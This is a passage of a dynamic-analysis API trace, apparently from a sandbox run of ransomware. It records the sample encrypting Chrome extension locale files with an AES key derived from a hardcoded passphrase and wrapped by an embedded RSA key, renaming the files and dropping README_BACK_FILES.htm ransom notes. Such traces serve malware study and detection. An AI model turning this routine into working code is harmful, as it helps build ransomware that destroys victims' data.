data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_pt\\readme_back_files.htm")) returned 0xffffffff [0249.438] AreFileApisANSI () returned 1 [0249.438] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3508, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0249.438] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_pt\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.438] GetFileType (hFile=0x5d54) returned 0x1 [0249.439] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.439] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.440] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0249.440] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.440] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.440] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0249.440] GetLastError () returned 0x0 [0249.440] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json")) returned 0x20 [0249.440] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json", dwFileAttributes=0x80) returned 1 [0249.440] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.441] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0249.441] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0249.442] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d3d0) returned 1 [0249.444] CryptCreateHash (in: hProv=0x293d3d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0249.444] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0249.444] CryptHashData (hHash=0x2938978, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.444] CryptDeriveKey (in: hProv=0x293d3d0, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29374f8) returned 1 [0249.444] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.444] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0249.444] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2940208) returned 1 [0249.445] CryptImportPublicKeyInfo (in: hCryptProv=0x2940208, dwCertEncodingType=0x1, pInfo=0x2933560*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2933590*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2933598*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937ff8) returned 1 [0249.445] CryptEncrypt (in: hKey=0x2937ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0249.445] CryptEncrypt (in: hKey=0x2937ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293fc30*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293fc30*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0249.445] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293fc30*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293fc30*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0249.446] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xd5, lpOverlapped=0x0) returned 1 [0249.447] CryptEncrypt (in: hKey=0x29374f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd5, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0249.447] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0249.447] CloseHandle (hObject=0x5d58) returned 1 [0249.447] CloseHandle (hObject=0x5d5c) returned 1 [0249.448] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json"), bFailIfExists=0) returned 1 [0249.451] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json", dwFileAttributes=0x0) returned 1 [0249.451] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json.gsg")) returned 1 [0249.452] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json.fuck")) returned 1 [0249.453] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.453] CryptDestroyKey (hKey=0x29374f8) returned 1 [0249.453] CryptReleaseContext (hProv=0x293d3d0, dwFlags=0x0) returned 1 [0249.453] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.453] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.453] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\readme_back_files.htm")) returned 0xffffffff [0249.453] AreFileApisANSI () returned 1 [0249.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3460, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0249.454] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.454] GetFileType (hFile=0x5d54) returned 0x1 [0249.454] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.455] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.455] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0249.457] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.457] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.457] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0249.457] GetLastError () returned 0x0 [0249.457] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json")) returned 0x20 [0249.457] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json", dwFileAttributes=0x80) returned 1 [0249.458] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0249.458] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.460] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0249.460] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d3d0) returned 1 [0249.462] CryptCreateHash (in: hProv=0x293d3d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0249.462] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0249.462] CryptHashData (hHash=0x2938978, pbData=0x28cb5a8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.462] CryptDeriveKey (in: hProv=0x293d3d0, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29374f8) returned 1 [0249.462] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.462] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0249.462] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293f438) returned 1 [0249.462] CryptImportPublicKeyInfo (in: hCryptProv=0x293f438, dwCertEncodingType=0x1, pInfo=0x2932450*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2932480*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2932488*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937eb8) returned 1 [0249.462] CryptEncrypt (in: hKey=0x2937eb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0249.463] CryptEncrypt (in: hKey=0x2937eb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293f768*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293f768*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0249.463] WriteFile (in: hFile=0x5d58, lpBuffer=0x293f768*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293f768*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0249.463] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x10a, lpOverlapped=0x0) returned 1 [0249.465] CryptEncrypt (in: hKey=0x29374f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x10a, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0249.465] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0249.465] CloseHandle (hObject=0x5d5c) returned 1 [0249.465] CloseHandle (hObject=0x5d58) returned 1 [0249.465] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json"), bFailIfExists=0) returned 1 [0249.468] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json", dwFileAttributes=0x0) returned 1 [0249.468] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json.gsg")) returned 1 [0249.469] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json.fuck")) returned 1 [0249.470] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.470] CryptDestroyKey (hKey=0x29374f8) returned 1 [0249.470] CryptReleaseContext (hProv=0x293d3d0, dwFlags=0x0) returned 1 [0249.470] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.470] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.470] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\readme_back_files.htm")) returned 0xffffffff [0249.471] AreFileApisANSI () returned 1 [0249.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e39a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0249.471] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.471] GetFileType (hFile=0x5d54) returned 0x1 [0249.471] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.472] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.473] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0249.473] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.473] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.473] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0249.473] GetLastError () returned 0x0 [0249.473] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json")) returned 0x20 [0249.473] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json", dwFileAttributes=0x80) returned 1 [0249.474] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.474] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0249.475] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0249.475] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d3d0) returned 1 [0249.477] CryptCreateHash (in: hProv=0x293d3d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, 